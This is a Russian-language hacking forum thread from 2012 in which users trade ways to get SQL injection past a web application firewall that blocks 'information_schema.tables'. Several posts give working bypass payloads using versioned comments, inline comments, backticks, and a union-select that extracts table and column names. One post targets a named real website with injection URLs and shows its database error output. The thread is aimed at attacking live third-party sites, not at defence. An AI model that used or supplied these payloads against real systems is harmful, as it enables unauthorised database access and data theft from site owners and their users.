HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 11.01.2012, 17:36
Breetonia
Познающий
Регистрация: 11.12.2011
Сообщений: 38
Провел на форуме:
7749

Репутация: 0
По умолчанию

Удалили ? Кто ? Я это был = ))
 
Ответить с цитированием

  #2  
Старый 11.01.2012, 18:59
trololoman96
Участник форума
Регистрация: 01.12.2011
Сообщений: 120
Провел на форуме:
29020

Репутация: 55
По умолчанию

/showpost.php?p=2951596&postcount=18
 
Ответить с цитированием

  #3  
Старый 11.01.2012, 19:01
Ereee
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
Провел на форуме:
102354

Репутация: 267


По умолчанию

Цитата:
Сообщение от trololoman96  
/showpost.php?p=2951596&postcount=18
У него известно название таблиц, а у меня нет.

information_schema.tables
 
Ответить с цитированием

  #4  
Старый 11.01.2012, 19:14
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

фильтр на

Цитата:
Сообщение от None  
from information_schema.tables
пробовал по-разному, так и так

/showpost.php?p=2289579&postcount=14623

/showpost.php?p=2386991&postcount=15253

все равно 403

Цитата:
Сообщение от None  
/*!union*/+/*!select*/
с этим все нормально, версию он выводит

и кстати, может быть что запрос режется?
 
Ответить с цитированием

  #5  
Старый 11.01.2012, 19:34
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Expl0ited, только на information_schema.tables

после того как появляется в запросе — forbidden
 
Ответить с цитированием

  #6  
Старый 11.01.2012, 19:55
Ereee
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
Провел на форуме:
102354

Репутация: 267


По умолчанию

Цитата:
Сообщение от faza02  
Expl0ited
, только на information_schema.tables
после того как появляется в запросе — forbidden
Попробуй такое извращение:

information_schema./**/tables

2trololoman96,

он уже писал, что такие мохинации не сработали...
 
Ответить с цитированием

  #7  
Старый 11.01.2012, 19:58
trololoman96
Участник форума
Регистрация: 01.12.2011
Сообщений: 120
Провел на форуме:
29020

Репутация: 55
По умолчанию

Цитата:
Сообщение от None  
Expl0ited, только на information_schema.tables
после того как появляется в запросе — forbidden
попробуй полностью запрос в /*!sql*/ взять, типа

Код:
s.php?id=1+/*!union+select+1,2,3+information_schema.tables*/
 
Ответить с цитированием

  #8  
Старый 11.01.2012, 23:43
Boolean
Участник форума
Регистрация: 05.09.2010
Сообщений: 147
Провел на форуме:
40748

Репутация: 78
По умолчанию

При таких фильтрах в 80% случаев помогает `.

Код:
`information_schema`.`tables`
 
Ответить с цитированием

  #9  
Старый 11.01.2012, 23:45
Expl0ited
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
Провел на форуме:
262707

Репутация: 935


По умолчанию

Там было всё проще:

Код:
id=(1)and+false/*!union*//*!select(1),2,unhex(hex(concat_ws(0x3a,table_name,  column_name))),(4)from(information_schema.columns)limit+1*/--+
 
Ответить с цитированием

  #10  
Старый 12.01.2012, 13:02
lightangel
Познающий
Регистрация: 07.11.2011
Сообщений: 91
Провел на форуме:
35174

Репутация: -6
По умолчанию

Код:
http://hydra-gym.com/index2.php?id=63
Код:
http://hydra-gym.com/index2.php?id=63/**/and/**/1=1/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+--+
But when I do id=- or id-null it gives me this error

Код:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/content/c/l/a/clarencecowan2/html/hydragym/includes/hitcounter.php on line 8

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/content/c/l/a/clarencecowan2/html/hydragym/includes/hitcounter.php on line 23
Error: Table 'hydragym.HitCounterRef_1' doesn't exist
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.